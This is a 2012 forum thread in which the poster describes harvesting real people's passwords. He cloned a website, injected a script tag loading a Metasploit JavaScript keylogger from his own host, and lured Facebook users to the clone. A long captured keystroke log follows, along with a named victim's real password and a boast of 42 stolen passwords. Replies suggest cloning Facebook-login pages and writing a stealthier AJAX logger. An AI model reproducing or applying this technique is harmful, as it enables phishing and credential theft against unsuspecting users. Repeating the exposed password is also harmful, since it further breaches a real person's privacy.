Author Topic: Metasploit's javascript_keylogger  (Read 1552 times)

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Offline z3ro

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Metasploit's javascript_keylogger
« on: August 06, 2012, 03:38:24 pm »

Although I had discoverd the http_javascript_keylogger quite a long time ago, its only recently that I foung a rather effective way of using it - using it to harvest passwords.


-First, I used httrack to mirror the entire website onto my computer.
Code: [Select]
root@z3ro:~# httrack
Mirror launched on Mon, 12 Aug 2012 17:10:19 by HTTrack Website Copier/ [XR&CO'2010]
mirroring with the wizard help..
Done.: (27651 bytes) - OK
Thanks for using HTTrack!

-Next, I injected the javascript keylogger into the web page I had just copied.

Code: [Select]
root@z3ro:~# echo  "<script type="text/javascript" src="http://$IP:8081/log/NNRtKZNlErTh.js"></script>" >> /var/www/

-I then hosted the website on my computer using lighttpd and started the metasploit listener on port 8081. With my lighttpd running on port 80 and metasploit on port 8081, I forwarded the respective ports to make my website available from the internet.
-Everything was set on my side, I now only needed a 'victim'. And facebook proved to offer many.
-Convincing someone to 'check out' the website proved to be easier than expected.

Here's a preview from my last target:

Code: [Select]
Starting Metasploit
[*] Please wait while we load the module tree...

MMMN$                           vMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN

       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 916 exploits - 495 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops

demo => true
srvhost =>
srvport => 8081
uripath => log
[*] Listening on
[*] Using URL:
[*] Server started.
[*]  http_javascript_keylogger - Assigning client identifier '0779c624'
[+] [0779c624] Logging clean keystrokes to: /root/.msf4/loot/20120805194327_default_197.225.238.119_browser.keystrok_771244.txt
[+] [0779c624] Logging raw keystrokes to: /root/.msf4/loot/20120805194330_default_197.225.238.119_browser.keystrok_134192.txt
[+] [0779c624] Keys: m
[+] [0779c624] Keys: me
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: me
[+] [0779c624] Keys: m
[+] [0779c624] Keys: p
[+] [0779c624] Keys: pa
[+] [0779c624] Keys: pas
[+] [0779c624] Keys: pass
[+] [0779c624] Keys: passw
[+] [0779c624] Keys: passwo
[+] [0779c624] Keys: passwor
[+] [0779c624] Keys: password
[+] [0779c624] Keys: passwor
[+] [0779c624] Keys: passwo
[+] [0779c624] Keys: passw
[+] [0779c624] Keys: pass
[+] [0779c624] Keys: pas
[+] [0779c624] Keys: pa
[+] [0779c624] Keys: p
[+] [0779c624] Keys: m
[+] [0779c624] Keys: me
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifier<CR>
[+] [0779c624] Keys: j
[+] [0779c624] Keys: jr
[+] [0779c624] Keys: jra
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[+] [0779c624] Keys: jrasta
[+] [0779c624] Keys: jrastam
[+] [0779c624] Keys: jrastame
[+] [0779c624] Keys: jrastamec
[+] [0779c624] Keys: jrastameck
[+] [0779c624] Keys: jrastamecka
[+] [0779c624] Keys: jrastameckay
[+] [0779c624] Keys: jrastameckays
[+] [0779c624] Keys: jrastameckaysha
[+] [0779c624] Keys: jrastameckaysh
[+] [0779c624] Keys: jrastameckayshal
[+] [0779c624] Keys: jrastameckaysha
[+] [0779c624] Keys: jrastameckaysh
[+] [0779c624] Keys: jrastameckays
[+] [0779c624] Keys: jrastameckay
[+] [0779c624] Keys: jrastamecka
[+] [0779c624] Keys: jrastameck
[+] [0779c624] Keys: jrastamec
[+] [0779c624] Keys: jrastame
[+] [0779c624] Keys: jrastam
[+] [0779c624] Keys: jrasta
[+] [0779c624] Keys: jrast
[+] [0779c624] Keys: jras
[+] [0779c624] Keys: jra
[+] [0779c624] Keys: jr
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j0
[+] [0779c624] Keys: j0k
[+] [0779c624] Keys: j0ks
[+] [0779c624] Keys: j0ksh
[+] [0779c624] Keys: j0ksh4
[+] [0779c624] Keys: j0ksh4s
[+] [0779c624] Keys: j0ksh4sh
[+] [0779c624] Keys: j0ksh4sh4
[+] [0779c624] Keys: j0ksh4sh4l4
[+] [0779c624] Keys: j0ksh4sh4l
[+] [0779c624] Keys: j0ksh4sh4l4e
[+] [0779c624] Keys: j0ksh4sh4l4ev
[+] [0779c624] Keys: j0ksh4sh4l4ev4
[+] [0779c624] Keys: j0ksh4sh4l4ev
[+] [0779c624] Keys: j0ksh4sh4l4e
[+] [0779c624] Keys: j0ksh4sh4l4
[+] [0779c624] Keys: j0ksh4sh4l
[+] [0779c624] Keys: j0ksh4sh4
[+] [0779c624] Keys: j0ksh4sh
[+] [0779c624] Keys: j0ksh4s
[+] [0779c624] Keys: j0ksh4
[+] [0779c624] Keys: j0ksh
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[+] [0779c624] Keys: j0k
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[+] [0779c624] Keys: j0
[+] [0779c624] Keys: w
[+] [0779c624] Keys: wi
[+] [0779c624] Keys: wis
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish u
[+] [0779c624] Keys: wish up
[+] [0779c624] Keys: wish up0
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a s
[+] [0779c624] Keys: wish up0n a st
[+] [0779c624] Keys: wish up0n a sta
[+] [0779c624] Keys: wish up0n a star
[+] [0779c624] Keys: wish up0n a sta
[+] [0779c624] Keys: wish up0n a st
[+] [0779c624] Keys: wish up0n a s
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0
[+] [0779c624] Keys: wish up
[+] [0779c624] Keys: wish u
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wis
[+] [0779c624] Keys: wi
[+] [0779c624] Keys: w
[+] [0779c624] Keys: a
[+] [0779c624] Keys: am
[+] [0779c624] Keys: amh
[+] [0779c624] Keys: amhg
[+] [0779c624] Keys: amhgw
[+] [0779c624] Keys: amhgws
[+] [0779c624] Keys: amhgwsd
[+] [0779c624] Keys: amhgwsdk
[+] [0779c624] Keys: amhgwsdkj
[+] [0779c624] Keys: amhgwsdkj.
[+] [0779c624] Keys: amhgwsdkj.c
[+] [0779c624] Keys: amhgwsdkj.ce
[+] [0779c624] Keys: amhgwsdkj.ced
[+] [0779c624] Keys: amhgwsdkj.cedv
[+] [0779c624] Keys: amhgwsdkj.cedvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/r
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rl
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ieo
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rl
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb
[+] [0779c624] Keys: amhgwsdkj.cedvhe/r
[+] [0779c624] Keys: amhgwsdkj.cedvhe/
[+] [0779c624] Keys: amhgwsdkj.cedv
[+] [0779c624] Keys: amhgwsdkj.cedvhe
[+] [0779c624] Keys: amhgwsdkj.ced
[+] [0779c624] Keys: amhgwsdkj.cedvh
[+] [0779c624] Keys: amhgwsdkj.c
[+] [0779c624] Keys: amhgwsdkj.ce
[+] [0779c624] Keys: amhgwsdkj.
[+] [0779c624] Keys: amhgwsdkj
[+] [0779c624] Keys: amhgwsdk
[+] [0779c624] Keys: amhgwsd
[+] [0779c624] Keys: amhgws
[+] [0779c624] Keys: amhgw
[+] [0779c624] Keys: amhg
[+] [0779c624] Keys: amh
[+] [0779c624] Keys: am
[+] [0779c624] Keys: a
[+] [0779c624] Keys: ab
[+] [0779c624] Keys: a
[+] [0779c624] Keys: abc
[+] [0779c624] Keys: abcd
[+] [0779c624] Keys: abcde
[+] [0779c624] Keys: abcdef
[+] [0779c624] Keys: abcdefg
[+] [0779c624] Keys: abcdefgh
[+] [0779c624] Keys: abcdefghi
[+] [0779c624] Keys: abcdefghij
[+] [0779c624] Keys: abcdefghijk
[+] [0779c624] Keys: abcdefghijkl
[+] [0779c624] Keys: abcdefghijklm
[+] [0779c624] Keys: abcdefghijklmn
[+] [0779c624] Keys: abcdefghijklmno
[+] [0779c624] Keys: abcdefghijklmnop
[+] [0779c624] Keys: abcdefghijklmnopq
[+] [0779c624] Keys: abcdefghijklmnopqr
[+] [0779c624] Keys: abcdefghijklmnopqrs
[+] [0779c624] Keys: abcdefghijklmnopqrst
[+] [0779c624] Keys: abcdefghijklmnopqrstu
[+] [0779c624] Keys: abcdefghijklmnopqrstuv
[+] [0779c624] Keys: abcdefghijklmnopqrstuvw
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwx
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwxy
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwxyz

That's it. His password was actually meinteraamplifier  and although the guy seemed to have enjoyed typing 'what-ever-he-felt-like-typing', I did get his passwd!

I have over 42 passwords now and I've concluded a success rate of about 87%

The human weakness factor is so much easier to penetrate than the network or server weaknesses. The attack is plain and simple, with no known problems with AV's.
~ God is real. Unless declared as an integer.

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Re: Metasploit's javascript_keylogger
« Reply #1 on: August 06, 2012, 04:43:09 pm »
The method can be very effective and you played this off well. The only thing I would change is the site you mirrored. A place to get email addressees and or user names would be good too. I don't see a lot of people, especially smart people putting in their actual password. A lot of people know how to make secure password already.

Maybe a site that uses a Facebook login would be good. Also, checking the URL could stop would-be key logs.

Overall good job, it's a great start.
>>>import this

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Re: Metasploit's javascript_keylogger
« Reply #2 on: August 06, 2012, 05:11:33 pm »
I don't get the point why you would use metasploit for that. That will raise firewalls :).

You can write a AJAX script who logs everything into a database of text file :D